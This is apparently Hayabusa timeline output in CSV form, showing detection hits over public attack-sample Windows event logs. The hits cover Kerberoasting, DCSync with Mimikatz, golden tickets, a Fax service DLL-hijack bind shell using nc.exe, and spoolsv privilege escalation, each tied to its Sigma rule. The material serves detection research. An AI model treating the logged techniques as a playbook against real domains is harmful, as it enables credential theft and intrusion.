Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal 
or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge 
Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from 
Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
